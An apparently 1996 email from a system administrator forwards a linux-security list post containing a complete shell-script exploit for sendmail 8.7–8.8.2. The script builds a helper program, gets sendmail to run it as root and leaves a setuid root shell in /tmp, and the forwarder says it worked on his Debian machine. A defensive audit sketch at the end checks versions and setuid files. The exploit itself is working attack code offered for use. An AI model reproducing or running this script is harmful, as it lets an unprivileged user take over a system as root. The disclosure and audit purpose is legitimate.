New vulnerability in Sendmail
Hello,
I received this from the Linux Security mailing list today. I checked the
CERT archives and apparently this problem is not yet documented. It looks
like it has a potential to be very serious.
I tested it out on my Debian system (sendmail 8.7.6) and it worked -- that is,
it gave a normal user a root shell. Yikes!
I have not yet seen any posted remedy for this situation, but I will be
certain to watch for one.
(CCs to Tom, Jeff, and Karl...I thought you might be interested to see this,
as it might affect your systems.)
------- Forwarded Message
Return-Path: linux-security-request@redhat.com
Received: (from uucp@localhost) by complete.org (8.7.6/8.7.3) with UUCP id
SAA27814 for jgoerzen@complete.org; Sun, 17 Nov 1996 18:06:59 -0600
Received: from relay2.redhat.com (relay2.redhat.com [199.183.24.246]) by
onyx.southwind.net (8.8.2/8.7.3) with SMTP id RAA27451 for
<jgoerzen@complete.org>; Sun, 17 Nov 1996 17:39:32 -0600 (CST)
Received: (qmail 9371 invoked from network); 17 Nov 1996 23:29:37 -0000
Received: from redhat.com (list@199.183.24.1)
by relay2.redhat.com with SMTP; 17 Nov 1996 23:29:35 -0000
Received: (from list@localhost) by redhat.com (8.7.4/8.7.3) id SAA24956; Sun,
17 Nov 1996 18:29:15 -0500
Resent-Date: Sun, 17 Nov 1996 18:28:02 -0500
Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
To: linux-security@redhat.com
Message-id: <Pine.LNX.3.95.961117023402.9268A-100000@linnea.asogy.stockholm.se>
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
Content-transfer-encoding: 7BIT
Old-X-Envelope-From: sdx@linnea.asogy.stockholm.se Sat Nov 16 20:31:43 1996
Old-Status: O
Resent-Message-ID: <"5yBDt1.0.F46.1-vZo"@redhat.com>
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/17
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Sendmail 8.8.2 exploit.
Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:
#! /bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
"\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
------- End of Forwarded Message
--
John Goerzen | System administrator & owner, The Communications
Custom programming | Centre and Complete Network (complete.org)
jgoerzen@complete.org | Free Unix shell access, 316-367-8490 w/ your modem.
--
This message was distributed manually by Bruce@debian.org after the list
initially failed to distribute it.
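
For administrators checking their own hosts against the two conditions stated in the forwarded message (a sendmail version in 8.7 through 8.8.2, installed mode 4111 or similar), here is an added audit sketch. It is not part of the original post or of sendmail; the function names are hypothetical and the version string is assumed to be supplied by the caller.

```shell
#!/bin/sh
# Added audit example; function names are hypothetical, not from the post.

# Return 0 if VERSION (e.g. 8.7.6) lies in 8.7 through 8.8.2, the range
# given in the forwarded script's header comment.
version_in_reported_range() {
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    case "$major$minor$patch" in *[!0-9]*) return 2 ;; esac
    [ "$major" -eq 8 ] || return 1
    [ "$minor" -eq 7 ] && return 0
    [ "$minor" -eq 8 ] && [ "$patch" -le 2 ] && return 0
    return 1
}

# Return 0 if FILE is set-user-ID and executable by "other" (mode 4111 or
# similar), the condition stated in the forwarded message.
is_setuid_world_exec() {
    [ -f "$1" ] && [ -n "$(find "$1" -prune -perm -4001 2>/dev/null)" ]
}

# Print set-user-ID regular files under DIR, one per line. Run it on /tmp,
# where the script says it leaves a shell; any output needs investigating.
list_setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Return 1 and print a finding when BIN meets both conditions.
# VERSION is supplied by the caller (assumption: read from the package db).
audit_sendmail() {
    bin=$1; ver=$2; hits=0
    version_in_reported_range "$ver" && hits=$((hits + 1))
    is_setuid_world_exec "$bin" && hits=$((hits + 1))
    if [ "$hits" -eq 2 ]; then
        echo "EXPOSED: $bin (version $ver) meets both conditions"
        return 1
    fi
    echo "ok: $bin (version $ver)"
}
```

Typical use is `audit_sendmail /usr/sbin/sendmail 8.7.6` followed by `list_setuid_files /tmp`.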